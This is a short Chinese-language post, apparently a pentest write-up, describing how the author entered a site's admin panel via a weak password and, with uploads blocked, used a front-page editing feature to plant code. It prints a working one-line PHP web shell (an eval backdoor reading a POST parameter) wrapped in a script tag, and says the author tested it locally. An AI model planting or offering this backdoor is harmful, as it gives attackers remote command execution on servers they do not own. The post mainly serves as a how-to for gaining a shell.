以前在测试一个网站的时候,大佬提供了一个拿shell的思路,通过js拿到了shell。
当时的情况是这样的,首页为*****/bin/home.php,通过弱口令进入后台,后台所有上传等可以拿shell的路都被阻止了,当时有一个可以控制前端页面的功能点
凭上面的解释就可以看出来,这个是可以通过这里来修改首页内容的,这里仅仅做一个小演示
可以发现js的代码是可以成功执行的,就可以通过了这个方法来拿shell了,因为js的language参数是可以支持其他的语言的执行的,具体的可以自己去尝试,这里我们使用的是
<script language=php>@eval($_POST['web']);</script>
我在本地进行一次测试,就可以展现出效果了